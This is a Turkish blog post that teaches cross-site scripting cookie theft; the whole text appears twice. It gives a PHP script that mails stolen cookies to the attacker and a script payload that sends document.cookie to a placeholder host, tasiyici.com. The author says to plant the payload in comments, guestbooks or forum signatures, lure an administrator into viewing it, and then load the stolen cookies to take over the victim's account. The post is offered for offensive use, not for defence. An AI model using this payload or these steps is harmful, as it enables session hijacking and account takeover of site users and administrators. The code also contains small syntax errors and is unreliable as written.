XSS Cookie Çalma
Selamın Aleykün Uzun Soluklu anlatımlara Tekrardan dewam Ediyorum..
Bloguma sıradan bir okuyucu olarak giriş yaptığımda makalelerin çok kısa ve anlaşılmaz olduğunu farkettim..
Not defteride öyledir değilmi sadece yazan anlasa yeterli olur..
Ancak okuyucu Faktörünü Göz Önüne Alarak yazmaya dewam edeceğim inşşallah..
Şimdi sizinle beraber bir site kuracağız..
Bu site saldırımızda bize yardımcı olacak..
Ben sitenin adını Taşıyıcı koymak istiyorum..
Çünkü site cookie bilgilerini bize taşımakla görevli..
Sitemizin adı:[ http://Tasiyici.com ]
Bu gerçek bir domain değil anlaşılır olması adına bu ismi kullanıyorum..
Umarım daha önce web sitesi kurmuşsunuzdur..
Çünkü o konuya girersek işin içinden çıkamayız..
Ben direkt olarak php kodunu vereceğim..
<php?
$cookie = $_GET[’data’];
$kime = "Buraya Mail Adresimiz yazılacak..";
$konu = "cookie";
mail ($kime,$konu,$cookie);
?>
Bu kodlar php kodlarıdır..
Bilgisayarınızda çalışmazlar..
Bunları bir web sunucusuna yüklemeniz gerek..
Ve web sunucunuzun Linux tabanlı olması gerekli..
Hostingerden Alacağınız bedava host bu iş için uygundur sanıyorum..
Kodları bir txt editörü ile açın ve cookie_tasi.php olarak kaydedin..
Ve Host'a Upload Edin..
Şimdi Taşıyıcımız hazır..
XSS Çapraz Site Betiklemesi Demektir..
Açıklı Siteyi bu Site İle(Tasiyici ile) Çapraz etkileşime sokcaz yani..
Açıklı Sitede html kodu çalıştırabileceğimiz bir alan lazım..
Bu bazen yorum satırıdır..
Bazen ziyaretçi defteri bazense arama kutucuğu..
Bu satır zaten XSS açığına sebeptir..
Bu Satırda Aşağıdaki komutu çalıştırdığımızda..
Sayfayı Açan Kişinin Cookie Bilgileri Bize Mail Olarak Gidecektir..
İşin Geriye Kalan Kısmı Sosyal Mühendisliğe Kalmıştır..
Yani Bu Yorumun Görüntülendiği Sayfayı Admin'e Açtırmalısınız..
<script>window.navigate("http://tasiyici.com/cookie_tasi.php?data="+document.cookie)</script>
Bu Forum sitelerinde imzanız olabilir..
Wordpress'te Böyle Açıklara Hayli Fazla..
Unutmayın Facebooktada Aynı Açık Vardı bi zamanlar..
Hatasız Kul Açıksız Sistem Yktur..
Cookieleri çekmeyi başardığınızı farzediyorum..
Ve şimdi cookieleri kendi cookielerimizle değiştiriyoruz..
Bilgisayarım/C/DocumentsandSettings/Kullanıcıadı/Cookies
Klasörünü Açın..
Hedef sitenin adının yazılı olduğu txt'yi bulun..
Ve Cookieleri Değiştirin..
Yada Cookie Editörü kullanın..
Web Sitesine Girdiğinizde Cookielerini Çaldığınız kullanıcının Hesabı Aktif olacak..
Kolay gelsin Kafanıza Gör Takılın..
Bloguma sıradan bir okuyucu olarak giriş yaptığımda makalelerin çok kısa ve anlaşılmaz olduğunu farkettim..
Not defteride öyledir değilmi sadece yazan anlasa yeterli olur..
Ancak okuyucu Faktörünü Göz Önüne Alarak yazmaya dewam edeceğim inşşallah..
Şimdi sizinle beraber bir site kuracağız..
Bu site saldırımızda bize yardımcı olacak..
Ben sitenin adını Taşıyıcı koymak istiyorum..
Çünkü site cookie bilgilerini bize taşımakla görevli..
Sitemizin adı:[ http://Tasiyici.com ]
Bu gerçek bir domain değil anlaşılır olması adına bu ismi kullanıyorum..
Umarım daha önce web sitesi kurmuşsunuzdur..
Çünkü o konuya girersek işin içinden çıkamayız..
Ben direkt olarak php kodunu vereceğim..
<php?
$cookie = $_GET[’data’];
$kime = "Buraya Mail Adresimiz yazılacak..";
$konu = "cookie";
mail ($kime,$konu,$cookie);
?>
Bu kodlar php kodlarıdır..
Bilgisayarınızda çalışmazlar..
Bunları bir web sunucusuna yüklemeniz gerek..
Ve web sunucunuzun Linux tabanlı olması gerekli..
Hostingerden Alacağınız bedava host bu iş için uygundur sanıyorum..
Kodları bir txt editörü ile açın ve cookie_tasi.php olarak kaydedin..
Ve Host'a Upload Edin..
Şimdi Taşıyıcımız hazır..
XSS Çapraz Site Betiklemesi Demektir..
Açıklı Siteyi bu Site İle(Tasiyici ile) Çapraz etkileşime sokcaz yani..
Açıklı Sitede html kodu çalıştırabileceğimiz bir alan lazım..
Bu bazen yorum satırıdır..
Bazen ziyaretçi defteri bazense arama kutucuğu..
Bu satır zaten XSS açığına sebeptir..
Bu Satırda Aşağıdaki komutu çalıştırdığımızda..
Sayfayı Açan Kişinin Cookie Bilgileri Bize Mail Olarak Gidecektir..
İşin Geriye Kalan Kısmı Sosyal Mühendisliğe Kalmıştır..
Yani Bu Yorumun Görüntülendiği Sayfayı Admin'e Açtırmalısınız..
<script>window.navigate("http://tasiyici.com/cookie_tasi.php?data="+document.cookie)</script>
Bu Forum sitelerinde imzanız olabilir..
Wordpress'te Böyle Açıklara Hayli Fazla..
Unutmayın Facebooktada Aynı Açık Vardı bi zamanlar..
Hatasız Kul Açıksız Sistem Yktur..
Cookieleri çekmeyi başardığınızı farzediyorum..
Ve şimdi cookieleri kendi cookielerimizle değiştiriyoruz..
Bilgisayarım/C/DocumentsandSettings/Kullanıcıadı/Cookies
Klasörünü Açın..
Hedef sitenin adının yazılı olduğu txt'yi bulun..
Ve Cookieleri Değiştirin..
Yada Cookie Editörü kullanın..
Web Sitesine Girdiğinizde Cookielerini Çaldığınız kullanıcının Hesabı Aktif olacak..
Kolay gelsin Kafanıza Gör Takılın..
Yorumlar
Yorum Gönder